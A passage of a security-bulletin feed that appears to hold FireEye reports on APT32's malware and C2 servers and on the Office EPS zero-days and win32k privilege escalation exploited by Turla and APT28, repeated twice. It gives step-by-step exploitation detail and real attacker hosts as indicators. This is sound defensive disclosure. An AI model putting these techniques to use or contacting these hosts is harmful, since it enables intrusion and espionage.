\n\n * C2 communications via DNS\n * Process creation\n * File upload\n * Shell command execution\n * File and directory enumeration/manipulation\n * Window enumeration\n * Registry 
manipulation\n * System information gathering \n \nPHOREAL\n\n| \n\n * C2 communications via ICMP\n * Reverse shell creation\n * Filesystem manipulation\n * Registry manipulation\n * Process creation\n * File upload \n \nBEACON (Cobalt Strike)\n\n| \n\n * Publicly available payload that can inject and execute arbitrary code into processes\n * Impersonating the security context of users\n * Importing Kerberos tickets\n * Uploading and downloading files\n * Executing shell commands\n * Configured with malleable C2 profiles to blend in with normal network traffic\n * Co-deployment and interoperability with Metasploit framework\n * SMB Named Pipe in-memory backdoor payload that enables peer-to-peer C2 and pivoting over SMB \n \nTable 3: APT32 Malware and Capabilities\n\nAPT32 operators appear to be well-resourced and supported as they use a large set of domains and IP addresses as command and control infrastructure. The [FireEye iSIGHT Intelligence MySIGHT Portal](<https://www.fireeye.com/products/isight-intelligence.html>) contains additional information on these backdoor families based on Mandiant investigations of APT32 intrusions.\n\nFigure 6 provides a summary of APT32 tools and techniques mapped to each stage of the attack lifecycle.\n\nFigure 6: APT32 Attack Lifecycle\n\n#### Outlook and Implications\n\nBased on incident response investigations, product detections, and intelligence observations along with additional publications on the same operators, FireEye assesses that APT32 is a cyber espionage group aligned with Vietnamese government interests. The targeting of private sector interests by APT32 is notable and FireEye believes the actor poses significant risk to companies doing business in, or preparing to invest in, the country. 
While the motivation for each APT32 private sector compromise varied \u2013 and in some cases was unknown \u2013 the unauthorized access could serve as a platform for law enforcement, intellectual property theft, or anticorruption measures that could ultimately erode the competitive advantage of targeted organizations. Furthermore, APT32 continues to threaten political activism and free speech in Southeast Asia and the public sector worldwide. Governments, journalists, and members of the Vietnam diaspora may continue to be targeted.\n\nWhile actors from China, Iran, Russia, and North Korea remain the most active cyber espionage threats tracked and responded to by FireEye, APT32 reflects a growing host of new countries that have adopted this dynamic capability. APT32 demonstrates how accessible and impactful offensive capabilities can be with the proper investment and the flexibility to embrace newly-available tools and techniques. As more countries utilize inexpensive and efficient cyber operations, there is a need for public awareness of these threats and renewed dialogue around emerging nation-state intrusions that go beyond public sector and intelligence targets.\n\n#### APT32 Detection\n\nFigure 7 contains a Yara rule can be used to identify malicious macros associated with APT32\u2019s phishing lures:\n\nFigure 7: Yara Rule for APT32 Malicious Macros\n\nTable 4 contains a sampling of the infrastructure that FireEye has associated with APT32 C2.\n\n**C2 Infrastructure** \n \n--- \n \n103.53.197.202\n\n| \n\n104.237.218.70\n\n| \n\n104.237.218.72 \n \n185.157.79.3\n\n| \n\n193.169.245.78\n\n| \n\n193.169.245.137 \n \n23.227.196.210\n\n| \n\n24.datatimes.org\n\n| \n\n80.255.3.87 \n \nblog.docksugs.org\n\n| \n\nblog.panggin.org\n\n| \n\ncontay.deaftone.com \n \ncheck.paidprefund.org\n\n| \n\ndatatimes.org\n\n| \n\ndocksugs.org \n \neconomy.bloghop.org\n\n| \n\nemp.gapte.name\n\n| \n\nfacebook-cdn.net \n \ngap-facebook.com\n\n| \n\ngl-appspot.org\n\n| 
\n\nhelp.checkonl.org \n \nhigh.expbas.net\n\n| \n\nhigh.vphelp.net\n\n| \n\nicon.torrentart.com \n \nimages.chinabytes.info\n\n| \n\nimaps.qki6.com\n\n| \n\nimg.fanspeed.net \n \njob.supperpow.com\n\n| \n\nlighpress.info\n\n| \n\nmenmin.strezf.com \n \nmobile.pagmobiles.info\n\n| \n\nnews.lighpress.info\n\n| \n\nnotificeva.com \n \nnsquery.net\n\n| \n\npagmobiles.info\n\n| \n\npaidprefund.org \n \npush.relasign.org\n\n| \n\nrelasign.org\n\n| \n\nshare.codehao.net \n \nseri.volveri.net\n\n| \n\nssl.zin0.com\n\n| \n\nstatic.jg7.org \n \nsyn.timeizu.net\n\n| \n\nteriava.com\n\n| \n\ntimeizu.net \n \ntonholding.com\n\n| \n\ntulationeva.com\n\n| \n\nuntitled.po9z.com \n \nupdate-flashs.com\n\n| \n\nvieweva.com\n\n| \n\nvolveri.net \n \nvphelp.net\n\n| \n\nyii.yiihao126.net\n\n| \n\nzone.apize.net \n \nTable 4: Sampling of APT32 C2 Infrastructure\n", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-05-14T18:00:00", "type": "fireeye", "title": "Cyber Espionage is Alive and Well: APT32 and the Threat to Global Corporations", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7255"], "modified": 
"2017-05-14T18:00:00", "id": "FIREEYE:8B4453AF3FA94076D63CCBDB94AFC782", "href": "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-06-06T23:14:39", "description": "In 2015, FireEye published details about two attacks exploiting vulnerabilities in Encapsulated PostScript (EPS) of Microsoft Office. One was a [zero-day](<https://www.fireeye.com/blog/threat-research/2015/09/attack_exploitingmi.html>) and one was [patched](<https://www.fireeye.com/blog/threat-research/2015/12/the_eps_awakens.html>) weeks before the attack launched.\n\nRecently, FireEye identified three new zero-day vulnerabilities in Microsoft Office products that are being exploited in the wild.\n\nAt the end of March 2017, we detected another malicious document leveraging an unknown vulnerability in EPS and a recently [patched](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0001>) vulnerability in Windows Graphics Device Interface (GDI) to drop malware. 
Following the April 2017 Patch Tuesday, in which Microsoft disabled EPS, FireEye detected a second unknown vulnerability in EPS.\n\nFireEye believes that two actors \u2013 [Turla](<https://www.fireeye.com/content/dam/fireeye-www/company/events/infosec/threat-landscape-overview-fireeye-summit-paris.pdf>) and an unknown financially motivated actor \u2013 were using the first EPS zero-day ([CVE-2017-0261](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0261>)), and [APT28](<https://www.fireeye.com/blog/threat-research/2014/10/apt28-a-window-into-russias-cyber-espionage-operations.html>) was using the second EPS zero-day ([CVE-2017-0262](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0262>)) along with a new Escalation of Privilege (EOP) zero-day ([CVE-2017-0263](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0263>)). Turla and APT28 are Russian cyber espionage groups that have used these zero-days against European diplomatic and military entities. The unidentified financial group targeted regional and global banks with offices in the Middle East. The following is a description of the EPS zero-days, associated malware, and the new EOP zero-day. Each EPS zero-day is accompanied by an EOP exploit, with the EOP being required to escape the sandbox that executes the FLTLDR.EXE instance used for EPS processing.\n\nThe malicious documents have been used to deliver three different payloads. CVE-2017-0261 was used to deliver SHIRIME (Turla) and NETWIRE (unknown financially motivated actor), and CVE-2017-0262 was used to deliver GAMEFISH (APT28). 
CVE-2017-0263 is used to escalate privileges during the delivery of the GAMEFISH payload.\n\nFireEye [email](<https://www.fireeye.com/products/ex-email-security-products.html>) and [network](<https://www.fireeye.com/products/nx-network-security-products.html>) products detected the malicious documents.\n\nFireEye has been coordinating with the Microsoft Security Response Center (MSRC) for the responsible disclosure of this information. Microsoft advises all customers to follow the guidance in [security advisory ADV170005](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV170005>) as a defense-in-depth measure against EPS filter vulnerabilities.\n\n#### CVE-2017-0261 \u2013 EPS _\"restore\"_ Use-After-Free\n\nUpon opening the Office document, the FLTLDR.EXE is utilized to render an embedded EPS image, which contains the exploit. The EPS file is a PostScript program, which leverages a Use-After-Free vulnerability in \u201c_restore_\u201d operand.\n\nFrom the [PostScript Manual](<https://www-cdf.fnal.gov/offline/PostScript/PLRM2.pdf>): \u201cAllocations in local VM and modifications to existing objects in local VM are subject to a feature called **save** and **restore**, named after the operators that invoke it. **save** and **restore** bracket a section of a PostScript language program whose local VM activity is to be encapsulated. **restore** deallocates new objects and undoes modifications to existing objects that were made since the matching **save**.\u201d\n\nAs the manual described, the _restore_ operator will reclaim memory allocated since the _save_ operator. This makes a perfect condition of Use-After-Free, when combined with _forall_ operator. Figure 1 shows the pseudo code to exploit the save and restore operation.\n\nFigure 1: Pseudo code for the exploit\n\nThe following operations allow the Pseudo code to leak metadata enabling a read/write primitive:\n\n 1. forall_proc array is created with a single element of the restore proc\n 2. 
The EPS state is **_saved_** to eps_state\n 3. uaf_array is created after the save\n 4. The forall operator loops over the elements of the uaf_array calling forall_proc for each element\n 5. The first element of uaf_array is passed to a call of restore_proc, the procedure contained in forall_proc\n 6. restore_proc\n * **_restores_** the initial state freeing the uaf_array\n * The alloc_string procedure reclaims the freed uaf_array\n * The forall_proc is updated to call leak_proc\n 7. Subsequent calls by the forall operator call the leak_proc on each element of the reclaimed uaf_array which elements now contain the result of the alloc_string procedure\n\nFigure 2 demonstrates a debug log of the uaf_array being used after being reclaimed.\n\nFigure 2: uaf_array reclaimed debug log\n\nBy manipulating the operations after the _save_ operator, the attacker is able to manipulate the memory layouts and convert the Use-After-Free to create a read/write primitive. Figure 3 shows the faked string, with length set as 0x7fffffff, base as 0.\n\nFigure 3: Faked String Object\n\nLeveraging the power of reading and writing arbitrary user memory, the EPS program continues by searching for gadgets to build the ROP chain, and creates a **_file_** object. Figure 4 demonstrates the faked file object in memory.\n\nFigure 4: Fake File Object, with ROP\n\nBy calling **_closefile_** operand with the faked file object, the exploit pivots to the ROP and starts the shellcode. Figure 5 shows part of the disassembler of **_closefile_** operand handler.\n\nFigure 5: Stack Pivot disassembler of closefile\n\nOnce execution has been achieved, the malware uses the ROP chain to change the execution protection of the memory region containing the shellcode. At this point, the shellcode is running within a sandbox that was executing FLTLDR.EXE and an escalation of privilege is required to escape that sandbox.\n\nFireEye detected two different versions of the EPS program exploiting this vulnerability. 
The first, st07383.en17.docx, continues by utilizing 32 or 64 bit versions of CVE-2017-0001 to escalate privileges before executing a final JavaScript payload containing a malware implant known as SHIRIME. SHIRIME is one of multiple custom JavaScript implants used by Turla as a first stage payload to conduct initial profiling of a target system and implement command and control. Since early 2016, we have observed multiple iterations of SHIRIME used in the wild, having the most recent version (v1.0.1004) employed in this zero-day\n\nThe second document, Confirmation_letter.docx, continues by utilizing 32 or 64 bit versions of CVE-2016-7255 to escalate privilege before dropping a new variant of the NETWIRE malware family. Several versions of this document were seen with similar filenames.\n\nThe EPS programs contained within these documents contained different logic to perform the construction of the ROP chain as well as build the shellcode. The first took the additional step of using a simple algorithm, shown in Figure 6, to obfuscate sections of the shellcode.\n\nFigure 6: Shellcode obfuscation algorithm\n\n#### CVE-2017-0262 \u2013 Type Confusion in EPS\n\nThe second EPS vulnerability is a type confused procedure object of forall operator that can alter the execution flow allowing an attacker to control values onto the operand stack. This vulnerability was found in a document named \u201cTrump's_Attack_on_Syria_English.docx\u201d.\n\nBefore triggering the vulnerability, the EPS program sprays the memory with predefined data to occupy specific memory address and facilitate the exploitation. Figure 7 demonstrates the PostScript code snippet of spraying memory with a string.\n\nFigure 7: PostScript code snippet of spray\n\nAfter execution, the content of string occupies the memory at address 0x0d80d000, leading to the memory layout as shown in Figure 8. 
The exploit leverages this layout and the content to forge a procedure object and manipulate the code flow to store predefined value, in yellow, to the operator stack.\n\nFigure 8: Memory layout of the sprayed data\n\nAfter spraying the heap, the exploit goes on to call a code statement in the following format: _1 array 16#D80D020 forall_. It creates an Array object, sets the procedure as the hex number 0xD80D020, and calls the _forall_ operator. During the operation of the forged procedure within _forall_ operator, it precisely controls the execution flow to store values of the attacker's choices to operand stack. Figure 9 shows the major code flow consuming the forged procedure.\n\nFigure 9: Consuming the forged procedure\n\nAfter execution of _forall_, the contents on the stack are under the attacker's control. This is s shown in Figure 10.\n\nFigure 10: Stack after the forall execution\n\nSince the operand stack has been manipulated, the subsequent operations of _exch_ defines objects based on the data from the manipulated stack, as shown in Figure 11.\n\nFigure 11: Subsequent code to retrieve data from stack\n\nThe A18 is a string type object, which has a length field of 0x7ffffff0, based from 0. Within memory, the layout as shown in Figure 12.\n\nFigure 12: A18 String Object\n\nThe A19 is an array type object, with member values all purposely crafted. The exploit defines another array object and puts it into the forged array A19. By performing these operations, it puts the newly created array object pointer into A19. The exploit can then directly read the value from the predictable address, 0xD80D020 + 0x38, and leak its vftable and infer module base address of EPSIMP32.flt. 
Figure 13 shows code snippets of leaking EPSIMP32 base address.\n\nFigure 13: Code snippet of leaking module base\n\nFigure 14 shows the operand stack of calling _put_ operator and the forged Array A19 after finishing the _put_ operation.\n\nFigure 14: Array A19 after the put operation\n\nBy leveraging the RW primitive string and the leaked module base of EPSIMP32, the exploit continues by searching ROP gadgets, creating a fake file object, and pivoting to shellcode through the _bytesavailable_ operator. Figure 15 shows the forged file type object and disassembling of pivoting to ROP and shellcode.\n\nFigure 15: Pivots to ROP and Shellcode\n\nThe shellcode continues by using a previously unknown EOP, CVE-2017-0263, to escalate privileges to escape the sandbox running FLTLDR.EXE, and then drop and execute a GAMEFISH payload. Only a 32-bit version of CVE-2017-0263 is contained in the shellcode.\n\n#### CVE-2017-0263 \u2013 win32k!xxxDestroyWindow Use-After-Free\n\nThe EOP Exploit setup starts by suspending all threads other than the current thread and saving the thread handles to a table, as shown in Figure 16.\n\n\n\nFigure 16: Suspending Threads\n\nThe exploit then checks for OS version and uses that information to populate version specific fields such as token offset, syscall number, etc. An executable memory area is allocated and populated with kernel mode shellcode as wells as address information required by the shellcode. A new thread is created for triggering the vulnerability and further control of exploitation.\n\nThe exploit starts by creating three PopupMenus and appending menus to them, as shown in Figure 17. The exploit creates 0x100 windows with random classnames. 
The User32!HMValidateHandle trick is used to leak the tagWnd address, which is used as kernel information leak throughout the exploit.\n\nFigure 17: Popup menu creation\n\nRegisterClassExW is then used to register a window class \u201cMain_Window_Class\u201d with a WndProc pointing to a function, which calls DestroyWindow on window table created by EventHookProc, explained later in the blog. This function also shows the first popup menu, which was created earlier.\n\nTwo extra windows are created with class name as \u201cMain_Window_Class\u201d. SetWindowLong is used to change WndProc of second window, wnd2, to a shellcode address. An application defined hook, WindowHookProc, and an event hook, EventHookProc, are installed by SetWindowsHookExW and SetWinEventHook respectively. PostMessage is used to post 0xABCD to first window, wnd1.\n\nThe EventHookProc waits for EVENT_SYSTEM_MENUPOPUPSTART and saves the window\u2019s handle to a table. WindowHookProc looks for **SysShadow **classname and sets a new WndProc for the corresponding window. Inside this WndProc, NtUserMNDragLeave syscall is invoked and SendMessage is used to send 0x9f9f to wnd2, invoking the shellcode shown in Figure 18.\n\n\n\nFigure 18: Triggering the shellcode\n\nThe Use-After-Free happens inside WM_NCDESTROY event in kernel and overwrites wnd2\u2019s tagWnd structure, which sets bServerSideWindowProc flag. With bServerSideWindowProc set, the user mode WndProc is considered as a kernel callback and will be invoked from kernel context \u2013 in this case wnd2\u2019s WndProc is the shellcode.\n\nThe shellcode checks whether the memory corruption has occurred by checking if the code segment is not the user mode code segment. It also checks whether the message sent is 0x9f9f. Once the validation is completed, shellcode finds the TOKEN address of current process and TOKEN of system process (pid 4). 
The shellcode then copies the system process\u2019 token to the current process, which elevates the privilege of the current process to SYSTEM.
Following [CVE-2017-0199](<https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html>), this is the second major vulnerability in as many months that has been used for both espionage and crime.\n\n**MD5**\n\n| \n\n**Filename**\n\n| \n\n**C2 Host** \n \n---|---|--- \n \n2abe3cc4bff46455a945d56c27e9fb45\n\n| \n\nConfirmation_letter.docx.bin\n\n(NETWIRE)\n\n| \n\n84.200.2.12 \n \ne091425d23b8db6082b40d25e938f871\n\n| \n\nConfirmation_letter.docx\n\n(NETWIRE)\n\n| \n\n138.201.44.30 \n \n006bdb19b6936329bffd4054e270dc6a\n\n| \n\nConfirmation_letter_ACM.docx\n\n(NETWIRE)\n\n| \n\n185.106.122.113 \n \n15660631e31c1172ba5a299a90938c02\n\n| \n\nst07383.en17.docx\n\n(SHIRIME)\n\n| \n\ntnsc.webredirect.org \n \nf8e92d8b5488ea76c40601c8f1a08790\n\n| \n\nTrump's_Attack_on_Syria_English.docx\n\n(GAMEFISH)\n\n| \n\nwmdmediacodecs.com \n \nTable 1: Source Exploit Documents\n\nTable 2: CVEs related to these attacks\n\n#### Acknowledgements\n\niSIGHT Intelligence Team, FLARE Team, FireEye Labs, Microsoft Security Response Center (MSRC).\n", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-05-09T13:00:00", "type": "fireeye", "title": "EPS Processing Zero-Days Exploited by Multiple Threat Actors ", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": 
"AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0001", "CVE-2017-0263", "CVE-2017-0199", "CVE-2016-7255", "CVE-2017-0262", "CVE-2017-0261"], "modified": "2017-05-09T13:00:00", "id": "FIREEYE:AA5B50E5C593F4E6EFF300E3DE9EDB85", "href": "https://www.fireeye.com/blog/threat-research/2017/05/eps-processing-zero-days.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:18:21", "description": "In 2015, FireEye published details about two attacks exploiting vulnerabilities in Encapsulated PostScript (EPS) of Microsoft Office. One was a [zero-day](<https://www.fireeye.com/blog/threat-research/2015/09/attack_exploitingmi.html>) and one was [patched](<https://www.fireeye.com/blog/threat-research/2015/12/the_eps_awakens.html>) weeks before the attack launched.\n\nRecently, FireEye identified three new zero-day vulnerabilities in Microsoft Office products that are being exploited in the wild.\n\nAt the end of March 2017, we detected another malicious document leveraging an unknown vulnerability in EPS and a recently [patched](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0001>) vulnerability in Windows Graphics Device Interface (GDI) to drop malware. 
Following the April 2017 Patch Tuesday, in which Microsoft disabled EPS, FireEye detected a second unknown vulnerability in EPS.\n\nFireEye believes that two actors \u2013 [Turla](<https://www.fireeye.com/content/dam/fireeye-www/company/events/infosec/threat-landscape-overview-fireeye-summit-paris.pdf>) and an unknown financially motivated actor \u2013 were using the first EPS zero-day ([CVE-2017-0261](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0261>)), and [APT28](<https://www.fireeye.com/blog/threat-research/2014/10/apt28-a-window-into-russias-cyber-espionage-operations.html>) was using the second EPS zero-day ([CVE-2017-0262](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0262>)) along with a new Escalation of Privilege (EOP) zero-day ([CVE-2017-0263](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0263>)). Turla and APT28 are Russian cyber espionage groups that have used these zero-days against European diplomatic and military entities. The unidentified financial group targeted regional and global banks with offices in the Middle East. The following is a description of the EPS zero-days, associated malware, and the new EOP zero-day. Each EPS zero-day is accompanied by an EOP exploit, with the EOP being required to escape the sandbox that executes the FLTLDR.EXE instance used for EPS processing.\n\nThe malicious documents have been used to deliver three different payloads. CVE-2017-0261 was used to deliver SHIRIME (Turla) and NETWIRE (unknown financially motivated actor), and CVE-2017-0262 was used to deliver GAMEFISH (APT28). 
CVE-2017-0263 is used to escalate privileges during the delivery of the GAMEFISH payload.\n\nFireEye [email](<https://www.fireeye.com/products/ex-email-security-products.html>) and [network](<https://www.fireeye.com/products/nx-network-security-products.html>) products detected the malicious documents.\n\nFireEye has been coordinating with the Microsoft Security Response Center (MSRC) for the responsible disclosure of this information. Microsoft advises all customers to follow the guidance in [security advisory ADV170005](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV170005>) as a defense-in-depth measure against EPS filter vulnerabilities.\n\n#### CVE-2017-0261 \u2013 EPS _\"restore\"_ Use-After-Free\n\nUpon opening the Office document, the FLTLDR.EXE is utilized to render an embedded EPS image, which contains the exploit. The EPS file is a PostScript program, which leverages a Use-After-Free vulnerability in \u201c_restore_\u201d operand.\n\nFrom the [PostScript Manual](<https://www-cdf.fnal.gov/offline/PostScript/PLRM2.pdf>): \u201cAllocations in local VM and modifications to existing objects in local VM are subject to a feature called **save** and **restore**, named after the operators that invoke it. **save** and **restore** bracket a section of a PostScript language program whose local VM activity is to be encapsulated. **restore** deallocates new objects and undoes modifications to existing objects that were made since the matching **save**.\u201d\n\nAs the manual described, the _restore_ operator will reclaim memory allocated since the _save_ operator. This makes a perfect condition of Use-After-Free, when combined with _forall_ operator. Figure 1 shows the pseudo code to exploit the save and restore operation.\n\nFigure 1: Pseudo code for the exploit\n\nThe following operations allow the Pseudo code to leak metadata enabling a read/write primitive:\n\n 1. forall_proc array is created with a single element of the restore proc\n 2. 
The EPS state is **_saved_** to eps_state\n 3. uaf_array is created after the save\n 4. The forall operator loops over the elements of the uaf_array calling forall_proc for each element\n 5. The first element of uaf_array is passed to a call of restore_proc, the procedure contained in forall_proc\n 6. restore_proc\n * **_restores_** the initial state freeing the uaf_array\n * The alloc_string procedure reclaims the freed uaf_array\n * The forall_proc is updated to call leak_proc\n 7. Subsequent calls by the forall operator call the leak_proc on each element of the reclaimed uaf_array which elements now contain the result of the alloc_string procedure\n\nFigure 2 demonstrates a debug log of the uaf_array being used after being reclaimed.\n\nFigure 2: uaf_array reclaimed debug log\n\nBy manipulating the operations after the _save_ operator, the attacker is able to manipulate the memory layouts and convert the Use-After-Free to create a read/write primitive. Figure 3 shows the faked string, with length set as 0x7fffffff, base as 0.\n\nFigure 3: Faked String Object\n\nLeveraging the power of reading and writing arbitrary user memory, the EPS program continues by searching for gadgets to build the ROP chain, and creates a **_file_** object. Figure 4 demonstrates the faked file object in memory.\n\nFigure 4: Fake File Object, with ROP\n\nBy calling **_closefile_** operand with the faked file object, the exploit pivots to the ROP and starts the shellcode. Figure 5 shows part of the disassembler of **_closefile_** operand handler.\n\nFigure 5: Stack Pivot disassembler of closefile\n\nOnce execution has been achieved, the malware uses the ROP chain to change the execution protection of the memory region containing the shellcode. At this point, the shellcode is running within a sandbox that was executing FLTLDR.EXE and an escalation of privilege is required to escape that sandbox.\n\nFireEye detected two different versions of the EPS program exploiting this vulnerability. 
The first, st07383.en17.docx, continues by utilizing 32 or 64 bit versions of CVE-2017-0001 to escalate privileges before executing a final JavaScript payload containing a malware implant known as SHIRIME. SHIRIME is one of multiple custom JavaScript implants used by Turla as a first stage payload to conduct initial profiling of a target system and implement command and control. Since early 2016, we have observed multiple iterations of SHIRIME used in the wild, having the most recent version (v1.0.1004) employed in this zero-day\n\nThe second document, Confirmation_letter.docx, continues by utilizing 32 or 64 bit versions of CVE-2016-7255 to escalate privilege before dropping a new variant of the NETWIRE malware family. Several versions of this document were seen with similar filenames.\n\nThe EPS programs contained within these documents contained different logic to perform the construction of the ROP chain as well as build the shellcode. The first took the additional step of using a simple algorithm, shown in Figure 6, to obfuscate sections of the shellcode.\n\nFigure 6: Shellcode obfuscation algorithm\n\n#### CVE-2017-0262 \u2013 Type Confusion in EPS\n\nThe second EPS vulnerability is a type confused procedure object of forall operator that can alter the execution flow allowing an attacker to control values onto the operand stack. This vulnerability was found in a document named \u201cTrump's_Attack_on_Syria_English.docx\u201d.\n\nBefore triggering the vulnerability, the EPS program sprays the memory with predefined data to occupy specific memory address and facilitate the exploitation. Figure 7 demonstrates the PostScript code snippet of spraying memory with a string.\n\nFigure 7: PostScript code snippet of spray\n\nAfter execution, the content of string occupies the memory at address 0x0d80d000, leading to the memory layout as shown in Figure 8. 
The exploit leverages this layout and the content to forge a procedure object and manipulate the code flow to store predefined value, in yellow, to the operator stack.\n\nFigure 8: Memory layout of the sprayed data\n\nAfter spraying the heap, the exploit goes on to call a code statement in the following format: _1 array 16#D80D020 forall_. It creates an Array object, sets the procedure as the hex number 0xD80D020, and calls the _forall_ operator. During the operation of the forged procedure within _forall_ operator, it precisely controls the execution flow to store values of the attacker's choices to operand stack. Figure 9 shows the major code flow consuming the forged procedure.\n\nFigure 9: Consuming the forged procedure\n\nAfter execution of _forall_, the contents on the stack are under the attacker's control. This is s shown in Figure 10.\n\nFigure 10: Stack after the forall execution\n\nSince the operand stack has been manipulated, the subsequent operations of _exch_ defines objects based on the data from the manipulated stack, as shown in Figure 11.\n\nFigure 11: Subsequent code to retrieve data from stack\n\nThe A18 is a string type object, which has a length field of 0x7ffffff0, based from 0. Within memory, the layout as shown in Figure 12.\n\nFigure 12: A18 String Object\n\nThe A19 is an array type object, with member values all purposely crafted. The exploit defines another array object and puts it into the forged array A19. By performing these operations, it puts the newly created array object pointer into A19. The exploit can then directly read the value from the predictable address, 0xD80D020 + 0x38, and leak its vftable and infer module base address of EPSIMP32.flt. 
Figure 13 shows code snippets of leaking EPSIMP32 base address.\n\nFigure 13: Code snippet of leaking module base\n\nFigure 14 shows the operand stack of calling _put_ operator and the forged Array A19 after finishing the _put_ operation.\n\nFigure 14: Array A19 after the put operation\n\nBy leveraging the RW primitive string and the leaked module base of EPSIMP32, the exploit continues by searching ROP gadgets, creating a fake file object, and pivoting to shellcode through the _bytesavailable_ operator. Figure 15 shows the forged file type object and disassembling of pivoting to ROP and shellcode.\n\nFigure 15: Pivots to ROP and Shellcode\n\nThe shellcode continues by using a previously unknown EOP, CVE-2017-0263, to escalate privileges to escape the sandbox running FLTLDR.EXE, and then drop and execute a GAMEFISH payload. Only a 32-bit version of CVE-2017-0263 is contained in the shellcode.\n\n#### CVE-2017-0263 \u2013 win32k!xxxDestroyWindow Use-After-Free\n\nThe EOP Exploit setup starts by suspending all threads other than the current thread and saving the thread handles to a table, as shown in Figure 16.\n\n\n\nFigure 16: Suspending Threads\n\nThe exploit then checks for OS version and uses that information to populate version specific fields such as token offset, syscall number, etc. An executable memory area is allocated and populated with kernel mode shellcode as wells as address information required by the shellcode. A new thread is created for triggering the vulnerability and further control of exploitation.\n\nThe exploit starts by creating three PopupMenus and appending menus to them, as shown in Figure 17. The exploit creates 0x100 windows with random classnames. 
The User32!HMValidateHandle trick is used to leak the tagWnd address, which is used as kernel information leak throughout the exploit.\n\nFigure 17: Popup menu creation\n\nRegisterClassExW is then used to register a window class \u201cMain_Window_Class\u201d with a WndProc pointing to a function, which calls DestroyWindow on window table created by EventHookProc, explained later in the blog. This function also shows the first popup menu, which was created earlier.\n\nTwo extra windows are created with class name as \u201cMain_Window_Class\u201d. SetWindowLong is used to change WndProc of second window, wnd2, to a shellcode address. An application defined hook, WindowHookProc, and an event hook, EventHookProc, are installed by SetWindowsHookExW and SetWinEventHook respectively. PostMessage is used to post 0xABCD to first window, wnd1.\n\nThe EventHookProc waits for EVENT_SYSTEM_MENUPOPUPSTART and saves the window\u2019s handle to a table. WindowHookProc looks for **SysShadow **classname and sets a new WndProc for the corresponding window. Inside this WndProc, NtUserMNDragLeave syscall is invoked and SendMessage is used to send 0x9f9f to wnd2, invoking the shellcode shown in Figure 18.\n\n\n\nFigure 18: Triggering the shellcode\n\nThe Use-After-Free happens inside WM_NCDESTROY event in kernel and overwrites wnd2\u2019s tagWnd structure, which sets bServerSideWindowProc flag. With bServerSideWindowProc set, the user mode WndProc is considered as a kernel callback and will be invoked from kernel context \u2013 in this case wnd2\u2019s WndProc is the shellcode.\n\nThe shellcode checks whether the memory corruption has occurred by checking if the code segment is not the user mode code segment. It also checks whether the message sent is 0x9f9f. Once the validation is completed, shellcode finds the TOKEN address of current process and TOKEN of system process (pid 4). 
The shellcode then copies the system process\u2019 token to the current process, which elevates the privilege of the current process to SYSTEM.
